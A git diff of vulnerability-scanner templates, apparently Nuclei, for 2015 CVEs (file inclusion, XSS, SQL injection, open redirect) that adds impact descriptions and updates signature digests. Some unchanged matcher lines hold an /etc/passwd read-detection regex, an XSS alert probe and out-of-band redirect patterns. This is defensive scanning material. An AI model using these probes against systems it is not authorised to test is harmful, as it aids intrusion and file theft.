     Upgrade to a version higher than 0.1.1 that includes proper input sanitization to mitigate the XSS vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220434d479161194367ef5bdeabc99ecce224e5eb386018022d7b36bb9cd86f4a80022100db8406f329f3110158d52bdf8474df76e91cc5cbe2833dae44fb1845ceb69a28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100da1a4b2faf843d0cd2958b81a243820ddf23198236e08945af7ee4d11fdfb1eb02201af82b252a624c7cfb3f00add99f97d655ab196de12585486f921fdbe24621d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml
index b73386f34d..1f1fb1103b 100644
--- a/http/cves/2015/CVE-2015-2996.yaml
+++ b/http/cves/2015/CVE-2015-2996.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
   remediation: |
     Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022027127218968c4ebc4883ae626fc6b033bf9d08b7bae8ff80f8c88b3953b5afb8022100e68941654c2dd867b74c212e8b4278eada3a1bc68d78c3f35946ebcd2168c82b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f404996a650f849f8acdc78913fc8ce52c3c0200abb5cf05a75bccfeefa98c850221009be38a6ea4eb6788d5a4093af9303d1ea1fcf9dbe3a19ef4684ace7e1b97c6dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml
index 1dac09e642..acf69a11a0 100644
--- a/http/cves/2015/CVE-2015-3035.yaml
+++ b/http/cves/2015/CVE-2015-3035.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310.  Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.
+  impact: |
+    An attacker can read sensitive files on the TP-LINK router, potentially leading to unauthorized access or disclosure of sensitive information.
   remediation: |
     Apply the latest firmware update provided by TP-LINK to fix the local file inclusion vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203d3544e30d96c50a58a03786b3d3737f3f030f987548b5ee2aa1cdc6c397c8f60220185cb4781be5bfdf3fac43b7aef4f1275cb1a576e2245c63ed113daf8bb27579:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f259341e5029ff24213042a775167d601b3f80f665399afb0b34b2db9fe65e14022100ee72ac5c20cd66f9efe68223934edaf14df250c33b3ef09386df79bf260973bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml
index eec6e6f5a6..7f2a2eb4fe 100644
--- a/http/cves/2015/CVE-2015-3224.yaml
+++ b/http/cves/2015/CVE-2015-3224.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.
+  impact: |
+    Remote code execution can lead to unauthorized access, data breaches, and complete compromise of the affected system.
   remediation: |
     Upgrade to a patched version of Ruby on Rails or disable the Web Console feature.
   reference:
@@ -52,4 +54,4 @@ http:
           - data-session-id=
         case-insensitive: true
         condition: or
-# digest: 490a00463044022030a9ec56a2053de400962821958e302bb581346ec23f4082fba0967b5e565a97022009fbd7e3d58fd326dc0203d68f647fa17a4378e67fe662943682b0f2d2aecad2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201197524d3133f59d30bf768865a3eb2e19500360f5ea87c9b8644f9b7166409d02203d2594302673a834215f81f3177a4cc40c415282c3471af3b589f3391c7ef914:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml
index f9b0dcafe5..ad4e273dfd 100644
--- a/http/cves/2015/CVE-2015-3337.yaml
+++ b/http/cves/2015/CVE-2015-3337.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server.
   remediation: |
     Upgrade to a patched version of Elasticsearch or apply the necessary security patches.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022074b988b6fbd498ff2da02c1600190011417c4937d77140ce896332d80bc19d830220029c2c4b46ea60a3dbda4eafc0b97c0cf31bc538b7a9b42648e160aa915d3fa5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c8ff66900de1efea5253bacb2bb6fc1e0ab52658637cd386a8f93e5b7f271700022066972a5ef010ff7ad2fe76934a64745cc1fa3efd7d250b36f784756b571e7a6b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml
index 83c8d686a2..fbbe025d59 100644
--- a/http/cves/2015/CVE-2015-3648.yaml
+++ b/http/cves/2015/CVE-2015-3648.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
   remediation: |
     Upgrade to the latest version of ResourceSpace to fix the local file inclusion vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205f8dae2fb3f2803224f58509a3e2b537f6058c6fd041beadd840d7880556f7b4022067528b3f292106857e5f77ee36afb0732e674d785f1c1a8084867a0201466706:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008bca698072e26a4fe5f7beb120720e28e335fd91dff894145386aad1d64cfa0d022100bd52fa1fdd4389bcb557b7debfc868e2b562498529ed1916c0588d8eeb52bdd7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml
index 73e1d3ebd7..caf7533128 100644
--- a/http/cves/2015/CVE-2015-3897.yaml
+++ b/http/cves/2015/CVE-2015-3897.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: regex
         regex:
           - "root:[x*]:0:0:"
-# digest: 490a0046304402203dab59205a8173c09c89962b1e82cc1ad4c357c490c44d0e35e18cabc9bc38aa022006b218c3af08dca68679bc9652df85f76329e16b2fd90e83689ffe6854ba9a9a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f166f87894929871da0a249591949d551feb8a59e23b35b7c0348aa0e149818e02203dc6bbbb1d0ec6cc49b5cfa60e0be43c5c529ef74e2954bb042cbf362d64dd01:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml
index 79f0d8513f..be416ec975 100644
--- a/http/cves/2015/CVE-2015-4050.yaml
+++ b/http/cves/2015/CVE-2015-4050.yaml
@@ -5,6 +5,8 @@ info:
   author: ELSFA7110,meme-lord
   severity: medium
   description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Symfony.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b178813fb89e08ea1a5c056dfd21cc294d359be292bb45f639562950bfa726fb022100a91750200d42e21a6625b231071f86859d555158d74883e6dd13c2a4e3d851f6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202c3ac48b45c8e7daf4c90f2a38d14a1e831a3bad62c4e3a35ba316a12e1449dc02203568e6541ba334ec9d0fd2b1fa07e30acfee5590d83fbf3070a16bef8611556a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml
index 5986d033e2..c7161a01c7 100644
--- a/http/cves/2015/CVE-2015-4062.yaml
+++ b/http/cves/2015/CVE-2015-4062.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: |
     Update to plugin version 0.9.9 or latest.
   reference:
@@ -49,4 +51,4 @@ http:
           - 'status_code == 200'
           - 'contains(body_2, "newstatpress_page_nsp_search")'
         condition: and
-# digest: 4b0a00483046022100c803d84d22072f599a7ab62cf1932bdd06e8a7bcd4ca7b62d49329551de1047e0221009ffab8f7cc3f4c8d97d3cba0ea9b88c49f6bb4ec7e58ab16731b26dff3e31802:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022030aece01455698628c0529a3d758174e67fde6f23fc1fb695e84146493ec67f302200fc808dc3035d718dd2aa3b7c708133d50b93317432dce4d9a822066a41c8f22:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml
index 18768e0497..fa067736ff 100644
--- a/http/cves/2015/CVE-2015-4063.yaml
+++ b/http/cves/2015/CVE-2015-4063.yaml
@@ -6,6 +6,8 @@ info:
   severity: low
   description: |
     WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: Update to plugin version 0.9.9 or latest.
   reference:
     - https://packetstormsecurity.com/files/132038/
@@ -47,4 +49,4 @@ http:
           - 'status_code_2 == 200'
           - "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"
         condition: and
-# digest: 490a0046304402200cd8a5b27cfc9fc530ff95131cad8be72216fa8b382eef61da6deabd162a0aa0022031ffe84b0ba3260144c0d00ac105fec6aeb628221f50c5434765fa57e0ab9290:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ff2a2fd9d67da069d7ff609b34b18085e9d7711902eb1840fdbe11e1f993c5e802204050c4a0e2e0f187bf80b25980a9b9802856f47e72a347b4f3ad65a87b075d45:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml
index fb35d3b066..32ba0bee7f 100644
--- a/http/cves/2015/CVE-2015-4074.yaml
+++ b/http/cves/2015/CVE-2015-4074.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server.
   remediation: |
     Upgrade to Joomla! Helpdesk Pro plugin version 1.4.0 or later to fix the local file inclusion vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009a9ccdf0b2006adf2528677a6039b670c0bf75031f8f0fe8f4659f6f38286024022100c8050d4bb0c8efbbfa9fc11744b34ebd8b703211bfcd90a23baa1152c60dbced:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220718e414ee98ec0a9588e6a33b625a43162976e64a7892d251b00f85ecd00fd9d022100c95d8b825c95aa25dbc8bc5c406ba494cacd398a7d7725532f1f6a57d169fc6e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml
index a083b7612b..0a060051c8 100644
--- a/http/cves/2015/CVE-2015-4127.yaml
+++ b/http/cves/2015/CVE-2015-4127.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.
+  impact: |
+    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update to the latest version of the WordPress Church Admin plugin (0.810 or higher) to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220118198b50dafe48aff7ca0fa12e94a5e81c22c422d7898381e1c665a1549d230022051bdf7aa7846c39e6a52b371dc846ccb6a3eab0efc8da79713b951540cc3abd6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e76da8e16adc870ba7a317f10137034d3e92b26f856f11d5d2ca8679540fea93022100c610d4e5b9010a07031da6a78df9268f6e357f90fe4e09d7bb89a53111286aac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml
index aa2281322e..b9bedd10b8 100644
--- a/http/cves/2015/CVE-2015-4414.yaml
+++ b/http/cves/2015/CVE-2015-4414.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
   remediation: |
     Update to the latest version of WordPress SE HTML5 Album Audio Player or apply the vendor-supplied patch to fix the directory traversal vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a95be776bc0abfebaf567c515b5eab8dc056f08d00a4ef6473d565ed99b9db83022061e470cd22a98ef70ce7f82db90d58a0dbc31eef9195ac3e1910ac160e08e1c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207ea47bc298c64d6068fa1d65374be7af86c917cae6a7cacfcdd0c23bf43f2c9f022100f615f6ae0030d1da2cff94117ceaa294906bd4088e88e6bc84bb1808e4eaba7e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml
index 3cb26cb008..4cb0a7f5b0 100644
--- a/http/cves/2015/CVE-2015-4632.yaml
+++ b/http/cves/2015/CVE-2015-4632.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
+  impact: |
+    An attacker can read or modify sensitive files, potentially leading to unauthorized access, data leakage, or system compromise.
   remediation: |
     Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203803488596f0e38a1b42b978cdf5859b9f41da8c23b84dd5dc452d642797ccc7022003306ec615a765804e5bd426eda6c732e55321bef480aa09bad9447b2f7aeefa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206dec9027ee012d64ef15cf26caa770cc234fdcc795e13ff260ad66132172d101022100a1b9062125c40151b151fe12a44dd54587ea7a5da3b9121a6c70133865a5f45d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml
index d2ba024a35..dc4d739857 100644
--- a/http/cves/2015/CVE-2015-4666.yaml
+++ b/http/cves/2015/CVE-2015-4666.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, disclosure of sensitive information, and potential remote code execution.
   remediation: |
     Upgrade Xceedium Xsuite to a version higher than 2.4.4.5 or apply the necessary patches provided by the vendor.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022077f099c430da53834c46bab966e74f5f4b641b3833ed73a4d67b459d353aedff02204df5821066ed398e81016f457ce8f8b15f207c5b2b316f4279871b3c146b96d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100db47aa7c0a08b75b1e5550104d8d2c14f6e55d320c2c0f5a73f8420d27f756ae022043e23f5ba31ea828201b80d2aa25bb665a3cb3ed11df29da6bd0a071835f4e70:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml
index 2ebaed95f8..c65d9fe3bd 100644
--- a/http/cves/2015/CVE-2015-4668.yaml
+++ b/http/cves/2015/CVE-2015-4668.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
   remediation: |
     Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability.
   reference:
@@ -38,4 +40,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022100f1b9d00a4be07a74101519b283dc12416a44e2ae1d1a71a8acd5fe97132794d302204ab207c2a45c3df8a612792ee64189d7bc37d10c6a58aa22fe0fea1213524359:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207d1ee06cb9a5b378c33cf828f2c2db24459191e7e96c95102dbc0b73a0f12d4b022058c7c74fd4b9eb32e9e3eb0c898ad084b509108bf796dfbb566d5db9a40e60af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml
index 8975798c8b..2520deca2c 100644
--- a/http/cves/2015/CVE-2015-4694.yaml
+++ b/http/cves/2015/CVE-2015-4694.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.
+  impact: |
+    Arbitrary file retrieval
   remediation: |
     Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022032eb70bab4b8f6c13c2f80d146e09471bd96afe12fee8279aba13ce196ef71c2022028a7843877be8d0cf7118685fe9aa7e0f22d35bcc6fddd4bf7acaf4e74ffae81:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201d3d5bb491de267e1c69d3486287471ff98ba98a6750ce8afa8d9e6c5fd8200e022100f503e943c4ccd85e5f04fea322f9b8c5f6fc54c559f3cebc98654dbfd0b19a89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml
index 1b0437ad3a..7268acf731 100644
--- a/http/cves/2015/CVE-2015-5354.yaml
+++ b/http/cves/2015/CVE-2015-5354.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of Novius OS.
   reference:
@@ -37,4 +39,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022100a508ade39c52d52433dfac77921b04b36030340c2e1563cceb17d39aadb561ef0220523d5172d424276e86d0ccc8a984d31b1723b44b332afb2ed3c778290899c64e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022021c481eb46801462efe96839803d56ee55d3ed5e455993266e6a1532ad861cdd022100e3db44111b055226cbec3e71789aeccf42d280ca3c56b4ec56a0f6102a165fd3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml
index f1b6572b17..57a0d918a8 100644
--- a/http/cves/2015/CVE-2015-5461.yaml
+++ b/http/cves/2015/CVE-2015-5461.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter.
+  impact: |
+    An attacker can trick users into visiting a malicious website, leading to potential phishing attacks.
   remediation: |
     Update to the latest version of the WordPress StageShow plugin (5.0.9 or higher) to fix the open redirect vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4b0a00483046022100886a5b7cf02365dafeeacdd4a7be6de23408f06fee9b988558be7611b7c7db9c022100d98e12870eb9875370c9425530e630069d1f80dbd00b8ec38f3683c806c11e1b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022070f4bf5a4419a82acfda59930ff4e88eeced50aa7823f1581174d9a1803f0f55022100d7b307f0a45ad64d1a5b23b47a061774f694f29643c98688a6b811c59ecb1111:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml
index ba8a71cb6a..2529d4786f 100644
--- a/http/cves/2015/CVE-2015-5469.yaml
+++ b/http/cves/2015/CVE-2015-5469.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php.
+  impact: |
+    The vulnerability can lead to unauthorized access to sensitive files, execution of arbitrary code, and potential compromise of the entire WordPress installation.
   remediation: |
     Update to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203277453c3d327bac930dd86a68c67e93f63debd5f6276897ca07e6ba55c36f8c02203b97f3380d3b01db3ee4bf26a675dda650354143c8e293f59407e1ea5b37fe2b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201b4c1f0713a6eed61983763feeb5802515eea5f075e23df6dfa975cf7c0ad3a10221008629f02ca4972a98232537c73de10d5be41ccc5a8dbd45c3d21fbe7885c2af00:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml
index 7309d34158..42cabb8cc6 100644
--- a/http/cves/2015/CVE-2015-5471.yaml
+++ b/http/cves/2015/CVE-2015-5471.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive information from the server, such as database credentials, and potentially execute arbitrary code.
   remediation: Upgrade to Swim Team version 1.45 or newer.
   reference:
     - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d21dcf785d19a7db340dd078c309f5ea161a7d30e4b24642063a9b27585c25ef02203a55c13416868ec4264835fc9dfde5d6daa5be50d1c00c616562b4b7dbc566b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022054adf595d4598d8079a43f04c54f567368148d6b369b91fb4dee06f3cd556691022100d43e726f5f270781a7a30857a8efb61e2683dc21642e2621602483eff03d4d0a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml
index 4d8d475b55..1814bc9326 100644
--- a/http/cves/2015/CVE-2015-5531.yaml
+++ b/http/cves/2015/CVE-2015-5531.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: medium
   description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
   remediation: |
     Upgrade ElasticSearch to version 1.6.1 or later to mitigate the vulnerability.
   reference:
@@ -66,4 +68,4 @@ http:
       - type: status
         status:
           - 400
-# digest: 4a0a00473045022009c54327b9210cbe3dc3ffdc43ae724f1915eb369cc29aadc6d2a951481dda200221009244e99cf71726edf10436597b76d5d84d7be6f8a83dd5e07a49516fdd2f8721:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022025dee33a28c40d6842a04f69f902866035d37b3dd71a515dc33e628a82216a31022041a3fea0ccfddf4bde198559f245fcab6faa0239b902c1233a0b3de59ee08543:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml
index e2fe626dfe..0c94435848 100644
--- a/http/cves/2015/CVE-2015-5688.yaml
+++ b/http/cves/2015/CVE-2015-5688.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js  that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
+  impact: |
+    The vulnerability can be exploited to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.
   remediation: |
     Upgrade Geddy to version 13.0.8 or later to mitigate the vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e4539e08c64e929c2fc1b67aa8eaf6359b8ee3881518dba019685135532ae789022100e996b46b2641199fc1e9fc8ef38c10efd6cbae81da613ca59746dbf6040c61ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205f6b6213a77637d232ed1e79782429484c6ec07861326a705ddbc57fd46e9356022100cc18e37ab04097c72550e0b40d3c694e44529a377144f3b3c611cbf071f3c505:922c64590222798bb761d5b6d8e72950
